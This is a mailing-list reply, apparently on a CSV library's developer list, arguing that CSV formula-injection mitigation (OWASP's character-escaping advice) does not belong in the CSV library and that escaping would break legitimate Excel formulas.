The TLDR version:  OWASP's recommendation is specifically to render code intended to be executed as unexecutable.  I'd suggest a fix be done at OWASP-Java-Encoder project and not here.  I believe the suggestion of providing this feature even at OWASP has near-zero value in the long run because the purpose of formulas in Excel IS to be executed--and Microsoft already offers the best speed bump.  Here be dragons!

I apologize.  This is going to be a TLDR response because I don't know any of you professionally so I'm erring on the side of completeness.  Sincere apologies if I'm stating things you believe to be obvious, or am myself ignorant of something obvious.

So I think there's a misunderstanding in regards to the threat described by the OWASP article.  The threat is explicitly *FORMULA *execution in Excel--and LibreOffice.  It sounds similar to a browser problem but its not, its far worse. The reason why this particular threat tends to be out of bounds in bug bounty programs and in CTF contests is that the attack that exploits this is a social engineering attack which always works in the real world. Hence why bug bounties won't pay out for it.

The recommendation from OWASP is as follows:

Encode the offending characters to:

 * Equals to (|=|)
 * Plus (|+|)
 * Minus (|-|)
 * At (|@|)
 * Tab (|0x09|)
 * Carriage return (|0x0D|)
 * The set [;',"] be similarly escaped

While this would be a mitigation, it would also /_*purposefully break*_//_any formulas_/ placed into a csv cell.  This is a critical point, and I'll come back to it later.   It's all or nothing.

This is where Phil's comment comes in:

First, let me stress again the risk:  The threat isn't masking cell contents, its *execution *of normal logic in a malicious way.  This is the €1M question:  "How do we differentiate corrupting values from valid values?"

Asking this csv library to do it means it has to take on quite a bit of intelligence.  It doesn't just have to understand what a CSV format is anymore.  It has to answer questions like "/*What's a corrupt equal sign look like?*/"  And it looks like a valid equal sign.  So to do this right, you have to do lexical analysis and parsing the same way that Excel is going to do it, and THEN you have to infer behavior.

Therefore to determine what corrupt characters look like given data designed to be executed you are now in the business of trying to interpret what the excel formula is doing, in order to determine whether or not its safe.  This is the core problem: formulas are bits of /user-supplied/ /code /*designed to be executed*.  If you escape it, you break it.  At best, you annoy the hell out of the accountant who was expecting your web app to offer a usable spreadsheet, while adding one layer of manual intervention other than the standard warning that MS Office provides whenever you open an Excel not created on your machine.

So... what can we do about it?  Microsoft already did it:

IMHO there's nothing that any intermediary library can do that's any better than this.    Web applications designed to take spreadsheets as input are special beasts.  The proper security rule of thumb is to always ensure DATA is treated as DATA.  But that rule gets *really funky* when that DATA is actually supposed to be executable code.  But that's your choice:  if you don't want it to execute you have to force it to be data, which will break execution by programmer intent.

However, I suspect a few of you will be unhappy with my "do nothing" suggestion and insist that something ought to be done.

I would recommend writing a CSV encoder for the owasp-java-encoder project. The framework is already in place and its where I push people if they only need encoding functions.

Why I wouldn't do it here:  libraries like this have to be written to the lowest-common-denominator, meaning csv format projects that don't have Excel as a target.  You want security functions to process as close to the business logic as possible, and this is the wrong target for that.  Doing it here means not breaking legacy code, which means by default, the option will be off.  (Or you follow a deprecation strategy.)  Further--this gets to my original hint about threat models--executing formulas in cells is a /desired function/ of Excel and its copies.  When developers start breaking spreadsheets they're going to revert to legacy behavior meaning you're really talking about improving the defensive capability for the security-minded developers that can stand up to the finance department.  When OWASP tells you "This attack is difficult to mitigate," it isn't just the technical issues involved--which I just outlined--its social.  This is why I'm hesitant to offer up "We'll do it in ESAPI," because I don't see the value-add in the bigger picture.  Plus, _*/this is Microsoft's fault/*_ and I'm not thrilled with writing code to speedbump *their* problem.  Which, I feel they've addressed as well as they ever will.

On 11/11/2021 4:36 AM, P. Ottlinger wrote:
Hi guys,

thanks for your reply.

Maybe I'm misinterpreting something but I thought that it could be made
possible to configure CSVFormat-object when writing the CSV data in a
way that any data with possibly corrupting values (as shown on the OWASP
page) will mask the whole contents of the cell.

Thus a library such as commons-csv would be able to lower the risk for
CSV injection and not every client/customer would have to manually
create this protecting logic.

To my mind it's a simple parser for "dangerous" tokens that quotes the
given data with additional " .... as we do not need to write
functioning Excel formulas into CSV.



Am 10.11.21 um 20:53 schrieb Gary Gregory:
I agree with Matt. CSV is just a container, it doesn't know or care what
the concept of a "formula" is.


